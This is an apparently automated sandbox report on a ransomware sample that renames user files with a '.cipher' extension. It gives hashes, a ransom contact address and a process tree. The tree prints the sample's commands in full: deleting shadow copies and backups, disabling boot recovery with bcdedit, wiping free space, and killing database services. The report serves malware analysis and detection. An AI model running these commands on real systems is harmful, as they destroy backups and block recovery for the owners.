Analysis
max time kernel: 91s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-20220901-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
submitted: 29-11-2022 11:01
Static task: static1
Behavioral task: behavioral1 (Sample: 64new_cip.exe, Resource: win7-20221111-en)
Behavioral task: behavioral2 (Sample: 64new_cip.exe, Resource: win10v2004-20220901-en)
General
Target: 64new_cip.exe
Size: 309KB
MD5: fb13a3efdbb801aef77603f6aaea272e
SHA1: 62f526f82da55e5e3bc835d0e3b770b236d5e99d
SHA256: eb5666adbcd60ab11747e32a63a98c0ff4b3949fdac0f6fb7f2b86246e34b51d
SHA512: 3baaf4bf823895f6916519dd571f984b79dd6756b9b9944ab02b4f19bbac466a6417ce1d6525d29acb1b92788bf15134146ae495d654828c52774233d8a2b0d3
SSDEEP: 6144:vPLavV9JccWJzcwYuUxhCKrSjZ5pjedRYc4ihyYr+3l09K2yaw7c:v+vV9CZMuUxhC6SjZfjeu++3GK7aw7c
Malware Config
Extracted from \??\A:\!-Recovery_Instructions-!.html:
  Mikesupp77@outlook.com
  https://tox.chat/download.html
Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes:
  PID 4936 (64new_cip.exe) created PID 3068 (Explorer.EXE)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  2276 bcdedit.exe
  4884 bcdedit.exe

Deletes System State backups (2 IoCs)
Processes:
  3580 wbadmin.exe
  1332 wbadmin.exe

Deletes system backups (1 IoC)
Processes:
  4184 wbadmin.exe

Modifies Installed Components in the registry (2 TTPs, 1 IoC)
Processes:
  explorer.exe: Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components

Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes:
  64new_cip.exe: File renamed C:\Users\Admin\Pictures\RedoPush.crw => C:\Users\Admin\Pictures\RedoPush.crw.cipher
  64new_cip.exe: File opened for modification C:\Users\Admin\Pictures\SyncInstall.tiff
  64new_cip.exe: File renamed C:\Users\Admin\Pictures\SyncInstall.tiff => C:\Users\Admin\Pictures\SyncInstall.tiff.cipher
  64new_cip.exe: File renamed C:\Users\Admin\Pictures\TraceResume.raw => C:\Users\Admin\Pictures\TraceResume.raw.cipher

Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  64new_cip.exe: File opened (read-only) \??\F:, \??\G:, \??\H:, \??\P:, \??\Q:, \??\S:, \??\Z:, \??\B:, \??\J:, \??\L:, \??\T:, \??\U:, \??\W:, \??\X:, \??\A:, \??\K:, \??\M:, \??\N:, \??\O:, \??\Y:, \??\E:, \??\R:, \??\V:, \??\I:

Drops file in Windows directory (3 IoCs)
Processes:
  wbadmin.exe: File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl
  wbadmin.exe: File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl
  wbadmin.exe: File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
Processes:
  2840 WerFault.exe, target PID 3068 (Explorer.EXE)
  680 WerFault.exe, target PID 4572 (explorer.exe)

Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  vds.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName
  vds.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000
  vds.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
  vds.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  948 vssadmin.exe

Kills process with taskkill (16 IoCs)
Processes:
  taskkill.exe, PIDs 1696, 3124, 1952, 4732, 3080, 4116, 4160, 816, 444, 1568, 520, 1104, 964, 4092, 1476, 1488

Modifies registry class (2 IoCs)
Processes:
  explorer.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{C6193E6C-B303-4195-914B-D9AC1A4DE0BD}
  explorer.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\

Runs net.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes:
  4936 64new_cip.exe (64 events)

Suspicious use of AdjustPrivilegeToken (59 IoCs)
Processes:
  taskkill.exe (PIDs 1952, 1476, 4732, 3080, 4116, 4160, 816, 1696, 1104, 3124, 964, 1488, 4092, 444, 1568, 520): Token: SeDebugPrivilege
  4220 vssvc.exe: Token: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  4108 WMIC.exe: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  4528 wbengine.exe: Token: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
  4572 explorer.exe: Token: SeShutdownPrivilege, SeCreatePagefilePrivilege (8 times each, alternating)

Suspicious use of FindShellTrayWindow (6 IoCs)
Processes:
  4572 explorer.exe (6 events)

Suspicious use of SendNotifyMessage (8 IoCs)
Processes:
  4572 explorer.exe (8 events)

Suspicious use of WriteProcessMemory (64 IoCs)
Processes (source PID -> target PID, repeat count):
  4936 64new_cip.exe -> 3176 cmd.exe (x3)
  3176 cmd.exe -> 2804 cmd.exe (x2)
  4936 64new_cip.exe -> 5036 cmd.exe (x3)
  5036 cmd.exe -> 2392 cmd.exe (x2)
  2392 cmd.exe -> 1952 taskkill.exe (x2)
  4936 64new_cip.exe -> 3844 cmd.exe (x3)
  3844 cmd.exe -> 4468 cmd.exe (x2)
  4468 cmd.exe -> 1476 taskkill.exe (x2)
  4936 64new_cip.exe -> 648 cmd.exe (x3)
  648 cmd.exe -> 220 cmd.exe (x2)
  220 cmd.exe -> 4732 taskkill.exe (x2)
  4936 64new_cip.exe -> 3156 cmd.exe (x3)
  3156 cmd.exe -> 4300 cmd.exe (x2)
  4300 cmd.exe -> 3080 taskkill.exe (x2)
  4936 64new_cip.exe -> 4420 cmd.exe (x3)
  4420 cmd.exe -> 2732 cmd.exe (x2)
  2732 cmd.exe -> 4116 taskkill.exe (x2)
  4936 64new_cip.exe -> 2440 cmd.exe (x3)
  2440 cmd.exe -> 4180 cmd.exe (x2)
  4180 cmd.exe -> 4160 taskkill.exe (x2)
  4936 64new_cip.exe -> 3620 cmd.exe (x3)
  3620 cmd.exe -> 4108 cmd.exe (x2)
  4108 cmd.exe -> 816 taskkill.exe (x2)
  4936 64new_cip.exe -> 4400 cmd.exe (x3)
  4400 cmd.exe -> 376 cmd.exe (x2)
  376 cmd.exe -> 1696 taskkill.exe (x2)
  4936 64new_cip.exe -> 5104 cmd.exe (x3)

System policy modification (1 TTP, 4 IoCs)
Processes:
  64new_cip.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
  64new_cip.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  64new_cip.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"
  64new_cip.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Processes (tree; [n] is the depth, each entry shows the image path, its command line and the signatures it triggered)

[1] C:\Windows\Explorer.EXE
    cmd: C:\Windows\Explorer.EXE
  [2] C:\Users\Admin\AppData\Local\Temp\64new_cip.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\64new_cip.exe"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Modifies extensions of user files
      - Enumerates connected drives
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - System policy modification
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im sqlbrowser.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlwriter.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im sqlwriter.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im sqlservr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im msmdsrv.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im MsDtsSrvr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im sqlceip.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im fdlauncher.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im Ssms.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im SQLAGENT.EXE
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im fdhost.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im fdlauncher.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im sqlservr.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im ReportingServicesService.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im msftesql.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im pg_ctl.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im postgres.exe
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c taskkill -f -im postgres.exe
        [5] C:\Windows\system32\taskkill.exe
            cmd: taskkill -f -im postgres.exe
            - Kills process with taskkill
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
        [5] C:\Windows\system32\net.exe
            cmd: net stop MSSQLServerADHelper100
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop MSSQLServerADHelper100
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
        [5] C:\Windows\system32\net.exe
            cmd: net stop MSSQL$ISARS
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop MSSQL$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
        [5] C:\Windows\system32\net.exe
            cmd: net stop MSSQL$MSFW
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop MSSQL$MSFW
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
        [5] C:\Windows\system32\net.exe
            cmd: net stop SQLAgent$ISARS
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop SQLAgent$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
        [5] C:\Windows\system32\net.exe
            cmd: net stop SQLAgent$MSFW
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop SQLAgent$MSFW
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop ReportServer$ISARS
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop ReportServer$ISARS
        [5] C:\Windows\system32\net.exe
            cmd: net stop ReportServer$ISARS
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop ReportServer$ISARS
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
        [5] C:\Windows\system32\net.exe
            cmd: net stop SQLWriter
          [6] C:\Windows\system32\net1.exe
              cmd: C:\Windows\system32\net1 stop SQLWriter
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
        [5] C:\Windows\system32\vssadmin.exe
            cmd: vssadmin.exe Delete Shadows /All /Quiet
            - Interacts with shadow copies
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
        [5] C:\Windows\system32\wbadmin.exe
            cmd: wbadmin DELETE SYSTEMSTATEBACKUP
            - Deletes System State backups
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
        [5] C:\Windows\System32\Wbem\WMIC.exe
            cmd: wmic.exe SHADOWCOPY /nointeractive
            - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
        [5] C:\Windows\system32\wbadmin.exe
            cmd: wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
            - Deletes System State backups
            - Drops file in Windows directory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersions:0 -quiet
        [5] C:\Windows\system32\wbadmin.exe
            cmd: wbadmin delete backup -keepVersions:0 -quiet
            - Deletes system backups
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoveryenabled No
        [5] C:\Windows\system32\bcdedit.exe
            cmd: bcdedit.exe /set {default} recoveryenabled No
            - Modifies boot configuration data using bcdedit
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      [4] C:\Windows\system32\cmd.exe
          cmd: C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        [5] C:\Windows\system32\bcdedit.exe
            cmd: bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
            - Modifies boot configuration data using bcdedit
    [3] C:\Windows\SysWOW64\cipher.exe
        cmd: cipher /w:\\?\C:
  [2] C:\Users\Admin\AppData\Local\Temp\64new_cip.exe
      cmd: \\?\C:\Users\Admin\AppData\Local\Temp\64new_cip.exe -network
      - System policy modification
    [3] C:\Windows\SysWOW64\cmd.exe
        cmd: C:\Windows\system32\cmd.exe /c pause
  [2] C:\Windows\system32\WerFault.exe
      cmd: C:\Windows\system32\WerFault.exe -u -p 3068 -s 2460
      - Program crash

[1] C:\Windows\system32\net.exe
    cmd: net stop SQLBrowser
  [2] C:\Windows\system32\net1.exe
      cmd: C:\Windows\system32\net1 stop SQLBrowser

[1] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -pss -s 444 -p 3068 -ip 3068

[1] C:\Windows\system32\vssvc.exe
    cmd: C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\wbengine.exe
    cmd: "C:\Windows\system32\wbengine.exe"
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\vdsldr.exe
    cmd: C:\Windows\System32\vdsldr.exe -Embedding

[1] C:\Windows\explorer.exe
    cmd: explorer.exe
    - Modifies Installed Components in the registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
  [2] C:\Windows\system32\WerFault.exe
      cmd: C:\Windows\system32\WerFault.exe -u -p 4572 -s 2216
      - Program crash

[1] C:\Windows\System32\vds.exe
    cmd: C:\Windows\System32\vds.exe
    - Checks SCSI registry key(s)

[1] C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -pss -s 524 -p 4572 -ip 4572
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.cipher
  Filesize: 624KB
  MD5: f6842e257d45f170521b603341bb3be3
  SHA1: 020f4a47f039fa987cb6a2aed5be0e8f2691bba2
  SHA256: dd0a59b0b3eea30bb068e4a0afcfc0e74bd3993544ed4260569e550a52e2cae6
  SHA512: a387775595d8dbe12819f1760bf3e18840d9e4c6d70589c4e6fda3636b2ee4c244ae32cf853d6f26d671975b8da04d3e3b94b07f0154197a9cac56a34ae50589
- memory/216-192-0x0000000000000000-mapping.dmp
- memory/220-144-0x0000000000000000-mapping.dmp
- memory/376-159-0x0000000000000000-mapping.dmp
- memory/380-168-0x0000000000000000-mapping.dmp
- memory/444-178-0x0000000000000000-mapping.dmp
- memory/520-184-0x0000000000000000-mapping.dmp
- memory/648-143-0x0000000000000000-mapping.dmp
- memory/648-194-0x0000000000000000-mapping.dmp
- memory/724-162-0x0000000000000000-mapping.dmp
- memory/816-157-0x0000000000000000-mapping.dmp
- memory/948-195-0x0000000000000000-mapping.dmp
- memory/964-169-0x0000000000000000-mapping.dmp
- memory/1104-163-0x0000000000000000-mapping.dmp
- memory/1476-142-0x0000000000000000-mapping.dmp
- memory/1476-190-0x0000000000000000-mapping.dmp
- memory/1488-172-0x0000000000000000-mapping.dmp
- memory/1568-181-0x0000000000000000-mapping.dmp
- memory/1696-160-0x0000000000000000-mapping.dmp
- memory/1844-180-0x0000000000000000-mapping.dmp
- memory/1924-183-0x0000000000000000-mapping.dmp
- memory/1944-185-0x0000000000000000-mapping.dmp
- memory/1952-139-0x0000000000000000-mapping.dmp
- memory/1960-189-0x0000000000000000-mapping.dmp
- memory/2392-187-0x0000000000000000-mapping.dmp
- memory/2392-138-0x0000000000000000-mapping.dmp
- memory/2440-152-0x0000000000000000-mapping.dmp
- memory/2732-150-0x0000000000000000-mapping.dmp
- memory/2804-136-0x0000000000000000-mapping.dmp
- memory/2840-191-0x0000000000000000-mapping.dmp
- memory/2896-186-0x0000000000000000-mapping.dmp
- memory/3064-165-0x0000000000000000-mapping.dmp
- memory/3080-148-0x0000000000000000-mapping.dmp
- memory/3124-166-0x0000000000000000-mapping.dmp
- memory/3156-198-0x0000000000000000-mapping.dmp
- memory/3156-146-0x0000000000000000-mapping.dmp
- memory/3176-135-0x0000000000000000-mapping.dmp
- memory/3268-171-0x0000000000000000-mapping.dmp
- memory/3452-179-0x0000000000000000-mapping.dmp
- memory/3548-174-0x0000000000000000-mapping.dmp
- memory/3620-155-0x0000000000000000-mapping.dmp
- memory/3708-170-0x0000000000000000-mapping.dmp
- memory/3844-140-0x0000000000000000-mapping.dmp
- memory/3988-182-0x0000000000000000-mapping.dmp
- memory/4012-188-0x0000000000000000-mapping.dmp
- memory/4092-175-0x0000000000000000-mapping.dmp
- memory/4108-156-0x0000000000000000-mapping.dmp
- memory/4116-151-0x0000000000000000-mapping.dmp
- memory/4124-164-0x0000000000000000-mapping.dmp
- memory/4160-154-0x0000000000000000-mapping.dmp
- memory/4180-153-0x0000000000000000-mapping.dmp
- memory/4240-196-0x0000000000000000-mapping.dmp
- memory/4300-147-0x0000000000000000-mapping.dmp
- memory/4328-193-0x0000000000000000-mapping.dmp
- memory/4400-158-0x0000000000000000-mapping.dmp
- memory/4420-149-0x0000000000000000-mapping.dmp
- memory/4468-141-0x0000000000000000-mapping.dmp
- memory/4492-176-0x0000000000000000-mapping.dmp
- memory/4532-197-0x0000000000000000-mapping.dmp
- memory/4612-167-0x0000000000000000-mapping.dmp
- memory/4732-145-0x0000000000000000-mapping.dmp
- memory/5036-137-0x0000000000000000-mapping.dmp
- memory/5080-173-0x0000000000000000-mapping.dmp
- memory/5104-161-0x0000000000000000-mapping.dmp
